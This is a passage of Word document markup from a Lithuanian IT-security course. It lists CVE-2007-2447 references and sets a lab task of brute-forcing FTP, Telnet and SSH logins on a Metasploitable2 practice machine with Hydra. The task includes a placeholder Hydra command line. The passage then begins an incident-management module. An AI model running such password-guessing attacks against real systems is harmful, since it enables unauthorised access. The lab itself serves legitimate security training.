        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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CVE-2007-2447.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="63DD80AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId124">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0723C663" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="52420375" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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CVE-2007-2447.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="63DD80AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId125">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.samba.org/samba/security/CVE-2007-2447.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75870DFA" w14:textId="0633AA95" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B46843E" w14:textId="563B6446" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14"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1</w:t>
      </w:r>
      <w:r w:rsidR="42890CD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SILPNI SLAPTAŽODŽIAI. JĖGOS BŪDAS SLAPTAŽODŽIAMS ATSPĖTI. UŽDUOT</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IS</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>„PAŽEIDŽIAMUMŲ IŠNAUDOJIMAS“</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (atlikti būtina)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E11F1E" w14:textId="15A328B4" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testuojama Sistema: Metasploitable2</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>veikianti virtualiame kompiuteryje</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A1FDC4" w14:textId="72273A0E" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sistema testavimui: Virtualus arba fizinis kompiuteris su testavimui skirta operacine sistema. Įdiegtas ir paruoštas darbui įrankis „HYDRA“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F1038" w14:textId="0E9363F0" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9ABC28" w14:textId="23D946E1" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pasiruošti TXT dokumentą su Metasploitable2 sistemoje esanči</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vartotojų sąrašu. Vienas vartotojas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>– viena teksto eilutė.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582ADCE" w14:textId="639A16FB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pasiruošti TXT dokumentą su galimais slaptažodžiais. Slaptažodžių sąrašus surasti internete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE2D50D" w14:textId="43FBE626" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Naudoti programinę įrangą „HYDRA“ vartotojų vardams ir slaptažodžiams atspėti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E075DF4" w14:textId="5C8F15FB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>„HYDRA“ naudoti populiariausiems protokolams: FTP</w:t>
      </w:r>
      <w:r w:rsidR="00C77190" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, TELNET, SSH</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kiti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F2DC0" w14:textId="4316FDB1" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>„HYDRA“ naudojimo pavyzdys: #hydra -L &lt;username_file&gt; -P &lt;password_file&gt; ftp://&lt;Target_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D87CE" w14:textId="77777777" w:rsidR="0068184F" w:rsidRPr="005A5C28" w:rsidRDefault="0068184F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05E25EF4" w14:textId="1DA51EDB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1163A2B2" w14:textId="55DFC93D" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="3C490B69" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nauser</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> V.</w:t>
      </w:r>
      <w:r w:rsidR="139527C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir Kessler</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="139527C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1B29292F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>R.</w:t>
      </w:r>
      <w:r w:rsidR="1B29292F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2D2208C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hydra Package Description.</w:t>
      </w:r>
      <w:r w:rsidR="2D2208C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="39C1FC53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Tools. </w:t>
      </w:r>
      <w:r w:rsidR="105D60C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId126">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://tools.kali.org/password-attacks/hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68A56F66" w14:textId="08026CBE" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D28724" w14:textId="60C8372E" w:rsidR="00A66EED" w:rsidRPr="005A5C28" w:rsidRDefault="00A66EED" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E308E4" w14:textId="12F6A6CC" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Modulis </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>„Informacinių ir ryšių technologijų pokyčių valdymas“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED8D8D0" w14:textId="26BB3959" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="00C808AA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70027010" w14:textId="77777777" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INCIDENTŲ VALDYMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2892011D" w14:textId="3793805E" w:rsidR="00C808AA" w:rsidRPr="005A5C28" w:rsidRDefault="522B8DAE"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UŽDUOTIES SĄLYGA: Sugalvoti, numatyti</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, sumodeliuoti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">galimus incidentus įmonės infrastruktūroje. </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="000302D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ateikti</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>trump</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> incidentų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>aprašym</w:t>
      </w:r>
      <w:r w:rsidR="00CD01D3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
